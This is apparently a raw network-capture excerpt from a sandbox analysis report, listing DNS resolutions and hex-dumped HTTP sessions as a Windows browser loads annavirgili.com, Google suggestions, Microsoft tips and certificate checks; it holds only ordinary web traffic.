                                                                                                          Dec 12, 2024 12:58:37.524857044 CET1.1.1.1192.168.2.240x18ccNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894583941 CET1.1.1.1192.168.2.240x175dNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894583941 CET1.1.1.1192.168.2.240x175dNo error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894583941 CET1.1.1.1192.168.2.240x175dNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894583941 CET1.1.1.1192.168.2.240x175dNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894583941 CET1.1.1.1192.168.2.240x175dNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.894624949 CET1.1.1.1192.168.2.240xf589No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941536903 CET1.1.1.1192.168.2.240xde3cNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941643000 CET1.1.1.1192.168.2.240xcf01No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941643000 CET1.1.1.1192.168.2.240xcf01No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941643000 CET1.1.1.1192.168.2.240xcf01No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941643000 CET1.1.1.1192.168.2.240xcf01No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.941643000 CET1.1.1.1192.168.2.240xcf01No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.661050081 CET1.1.1.1192.168.2.240xb762No error (0)script.hotjar.com13.227.8.16A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.661050081 CET1.1.1.1192.168.2.240xb762No error (0)script.hotjar.com13.227.8.35A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.661050081 CET1.1.1.1192.168.2.240xb762No error (0)script.hotjar.com13.227.8.4A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.661050081 CET1.1.1.1192.168.2.240xb762No error (0)script.hotjar.com13.227.8.2A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.890599966 CET1.1.1.1192.168.2.240x7890No error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.890599966 CET1.1.1.1192.168.2.240x7890No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.890599966 CET1.1.1.1192.168.2.240x7890No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.890599966 CET1.1.1.1192.168.2.240x7890No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.890599966 CET1.1.1.1192.168.2.240x7890No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.891099930 CET1.1.1.1192.168.2.240x3f1dNo error (0)mc.yandex.commc.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.748421907 CET1.1.1.1192.168.2.240xb906No error (0)script.hotjar.com13.227.8.35A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.748421907 CET1.1.1.1192.168.2.240xb906No error (0)script.hotjar.com13.227.8.4A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.748421907 CET1.1.1.1192.168.2.240xb906No error (0)script.hotjar.com13.227.8.16A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.748421907 CET1.1.1.1192.168.2.240xb906No error (0)script.hotjar.com13.227.8.2A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.061908960 CET1.1.1.1192.168.2.240xe23aNo error (0)ws.hotjar.comwsky-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)ws.hotjar.comwsky-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com34.240.184.84A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com99.80.243.206A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com34.243.183.178A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com52.48.69.66A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com52.17.177.204A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com54.220.38.244A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com54.229.143.124A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.062475920 CET1.1.1.1192.168.2.240xe6dNo error (0)wsky-live.live.eks.hotjar.com52.209.201.75A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.166058064 CET1.1.1.1192.168.2.240x9d32No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.431206942 CET1.1.1.1192.168.2.240xa2eaNo error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.431206942 CET1.1.1.1192.168.2.240xa2eaNo error (0)pacman-content-live.live.eks.hotjar.com108.128.190.134A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.431206942 CET1.1.1.1192.168.2.240xa2eaNo error (0)pacman-content-live.live.eks.hotjar.com54.155.186.43A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.431206942 CET1.1.1.1192.168.2.240xa2eaNo error (0)pacman-content-live.live.eks.hotjar.com52.49.166.168A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.480143070 CET1.1.1.1192.168.2.240xd607No error (0)vc.hotjar.iovc-live-cf.hotjar.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.562196970 CET1.1.1.1192.168.2.240x6b97No error (0)vc.hotjar.iovc-live-cf.hotjar.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.562196970 CET1.1.1.1192.168.2.240x6b97No error (0)vc-live-cf.hotjar.io18.66.161.61A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.562196970 CET1.1.1.1192.168.2.240x6b97No error (0)vc-live-cf.hotjar.io18.66.161.34A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.562196970 CET1.1.1.1192.168.2.240x6b97No error (0)vc-live-cf.hotjar.io18.66.161.106A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.562196970 CET1.1.1.1192.168.2.240x6b97No error (0)vc-live-cf.hotjar.io18.66.161.67A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.836895943 CET1.1.1.1192.168.2.240x4fd9No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.836895943 CET1.1.1.1192.168.2.240x4fd9No error (0)pacman-content-live.live.eks.hotjar.com108.128.190.134A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.836895943 CET1.1.1.1192.168.2.240x4fd9No error (0)pacman-content-live.live.eks.hotjar.com54.155.186.43A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.836895943 CET1.1.1.1192.168.2.240x4fd9No error (0)pacman-content-live.live.eks.hotjar.com52.49.166.168A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.840363026 CET1.1.1.1192.168.2.240x8927No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.682019949 CET1.1.1.1192.168.2.240x16e1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.682019949 CET1.1.1.1192.168.2.240x16e1No error (0)star-mini.c10r.facebook.com157.240.196.35A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.682111979 CET1.1.1.1192.168.2.240xd397No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.682111979 CET1.1.1.1192.168.2.240xd397No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.682111979 CET1.1.1.1192.168.2.240xd397No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.176871061 CET1.1.1.1192.168.2.240xc075No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.176871061 CET1.1.1.1192.168.2.240xc075No error (0)star-mini.c10r.facebook.com157.240.196.35A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.177653074 CET1.1.1.1192.168.2.240xf33fNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.177653074 CET1.1.1.1192.168.2.240xf33fNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.177653074 CET1.1.1.1192.168.2.240xf33fNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                          2024-12-12 11:57:46 UTC172.64.41.3192.168.2.240x0No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)true
                                                                                                          2024-12-12 11:57:46 UTC172.64.41.3192.168.2.240x0No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)true
                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          0192.168.2.2449742217.20.58.10180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 12, 2024 12:57:44.901702881 CET809INData Raw: 73 0a 63 1a 93 36 34 e5 43 ad b7 ab 3b a9 71 33 ba 5d a8 35 d1 05 3a 3a 73 d6 f4 b5 58 76 ee 97 d3 42 6f 94 5e 54 dd 54 b0 13 91 84 c3 7d 7c de f3 4c 69 03 21 04 9e 2b 97 db b7 35 b6 2b 01 af 92 7b 9e 84 13 2a b6 4a b2 50 ee 55 0a c9 a9 2a 7d f9
                                                                                                          Data Ascii: sc64C;q3]5::sXvBo^TT}|Li!+5+{*JPU*}mb\uQ[FwhVL4c>zU\+r[e6} D7#rsb|XjV8&0ej)r/nQ|DY%fU~Kp


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          1192.168.2.244996223.195.61.5680
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 12, 2024 12:58:41.220761061 CET227OUTGET / HTTP/1.1
                                                                                                          Cache-Control: max-age = 3600
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          If-Modified-Since: Mon, 12 Feb 2024 22:07:27 GMT
                                                                                                          If-None-Match: "65ca969f-2cd"
                                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                          Host: x1.c.lencr.org
                                                                                                          Dec 12, 2024 12:58:42.693176031 CET263INHTTP/1.1 304 Not Modified
                                                                                                          Content-Type: application/pkix-crl
                                                                                                          Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
                                                                                                          ETag: "65ca969f-2cd"
                                                                                                          Cache-Control: max-age=3600
                                                                                                          Expires: Thu, 12 Dec 2024 12:58:42 GMT
                                                                                                          Date: Thu, 12 Dec 2024 11:58:42 GMT
                                                                                                          Connection: keep-alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2449771147.135.166.53807012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 12, 2024 12:58:42.238300085 CET6OUTData Raw: 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2449770147.135.166.53807012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 12, 2024 12:58:42.334287882 CET6OUTData Raw: 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          0192.168.2.2449744172.64.41.3443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:57:46 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 128
                                                                                                          Accept: application/dns-message
                                                                                                          Accept-Language: *
                                                                                                          User-Agent: Chrome
                                                                                                          Accept-Encoding: identity
                                                                                                          Content-Type: application/dns-message
                                                                                                          2024-12-12 11:57:46 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 73 72 74 62 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 57 00 0c 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: srtbmsncom)WS
                                                                                                          2024-12-12 11:57:46 UTC247INHTTP/1.1 200 OK
                                                                                                          Server: cloudflare
                                                                                                          Date: Thu, 12 Dec 2024 11:57:46 GMT
                                                                                                          Content-Type: application/dns-message
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Content-Length: 468
                                                                                                          CF-RAY: 8f0d89efdfae0c8a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-12 11:57:46 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 73 72 74 62 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 54 01 00 06 03 77 77 77 c0 11 c0 2a 00 05 00 01 00 00 54 01 00 21 0b 77 77 77 2d 6d 73 6e 2d 63 6f 6d 06 61 2d 30 30 30 33 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 3c 00 05 00 01 00 00 00 91 00 02 c0 48 c0 48 00 01 00 01 00 00 00 91 00 04 cc 4f c5 cb 00 00 29 04 d0 00 00 00 00 01 4e 00 0c 01 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: srtbmsncomTwww*T!www-msn-coma-0003a-msedgenet<HHO)NJ


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          1192.168.2.2449751172.64.41.3443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:57:52 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 128
                                                                                                          Accept: application/dns-message
                                                                                                          Accept-Language: *
                                                                                                          User-Agent: Chrome
                                                                                                          Accept-Encoding: identity
                                                                                                          Content-Type: application/dns-message
                                                                                                          2024-12-12 11:57:52 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 63 78 63 73 09 6d 69 63 72 6f 73 6f 66 74 03 6e 65 74 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: cxcsmicrosoftnet)QM


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          2192.168.2.244976823.194.30.59443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:57:54 UTC746OUTGET /api/tips-content/de-ch/xml/tips?release=cobalt&environment=dashboard&resolutionType=merge HTTP/1.1
                                                                                                          Host: cxcs.microsoft.net
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Microsoft Edge";v="100", "Microsoft Edge WebView2";v="100"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Origin: https://windows.msn.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://windows.msn.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          If-None-Match: "93eaa60326dc4c17c3c6a4c2dbeb6569"
                                                                                                          2024-12-12 11:57:55 UTC202INHTTP/1.1 304 Not Modified
                                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                                          ETag: "93eaa60326dc4c17c3c6a4c2dbeb6569"
                                                                                                          Cache-Control: public, max-age=622
                                                                                                          Date: Thu, 12 Dec 2024 11:57:54 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2449769142.250.181.1004437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:57:58 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                          Host: www.google.com
                                                                                                          Connection: keep-alive
                                                                                                          X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCLKezgEI/aXOAQjtqc4BCOy8zgEIx8/OAQj/0M4BCJzSzgEIjtPOAQiz084BCOzVzgEY9MnNAQ==
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:57:59 UTC1266INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:57:58 GMT
                                                                                                          Pragma: no-cache
                                                                                                          Expires: -1
                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-rV-fq9etXAWQRnhYZ7HqGA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                          Permissions-Policy: unload=()
                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                          Server: gws
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          2024-12-12 11:57:59 UTC124INData Raw: 33 34 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 75 62 61 72 75 20 63 61 72 20 64 65 61 6c 65 72 73 68 69 70 22 2c 22 77 68 61 74 20 77 65 20 64 6f 20 69 6e 20 74 68 65 20 73 68 61 64 6f 77 73 20 73 65 72 69 65 73 20 66 69 6e 61 6c 65 22 2c 22 73 6f 6e 79 20 70 6c 61 79 73 74 61 74 69 6f 6e 20 77 72 61 70 20 75 70 20 32 30 32 34 22 2c 22 69 6f 77 61 20 68 61 77 6b 65
                                                                                                          Data Ascii: 34f)]}'["",["subaru car dealership","what we do in the shadows series finale","sony playstation wrap up 2024","iowa hawke
                                                                                                          2024-12-12 11:57:59 UTC730INData Raw: 79 65 73 20 76 73 20 69 6f 77 61 20 73 74 61 74 65 20 63 79 63 6c 6f 6e 65 73 22 2c 22 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 20 67 65 6d 69 6e 69 64 73 22 2c 22 75 73 20 6e 61 76 79 20 66 6f 72 64 20 63 6c 61 73 73 20 63 61 72 72 69 65 72 20 64 65 62 61 74 65 22 2c 22 67 6d 20 63 72 75 69 73 65 20 72 6f 62 6f 74 61 78 69 22 2c 22 73 6e 6f 77 66 61 6c 6c 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 6f 49 6b 6b 34 53 46 51 6f 52 56 48 4a 6c 62 6d 52
                                                                                                          Data Ascii: yes vs iowa state cyclones","meteor shower geminids","us navy ford class carrier debate","gm cruise robotaxi","snowfall weather forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmR
                                                                                                          2024-12-12 11:57:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2449772147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:57:58 UTC665OUTGET / HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-User: ?1
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:57:59 UTC336INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:57:59 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Cache-Control: no-cache
                                                                                                          WPO-Cache-Status: cached
                                                                                                          Last-Modified: Thu, 12 Dec 2024 10:23:12 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private, must-revalidate
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          2024-12-12 11:57:59 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                          Data Ascii: 2000
                                                                                                          2024-12-12 11:57:59 UTC8192INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 6e 6e 61 20 56 69 72 67 69 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 09 3c 73 74
                                                                                                          Data Ascii: <!doctype html><html lang="it-IT"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0"> <title>Anna Virgili</title><meta name='robots' content='max-image-preview:large' /><st
                                                                                                          2024-12-12 11:57:59 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-12 11:57:59 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                          Data Ascii: 2000
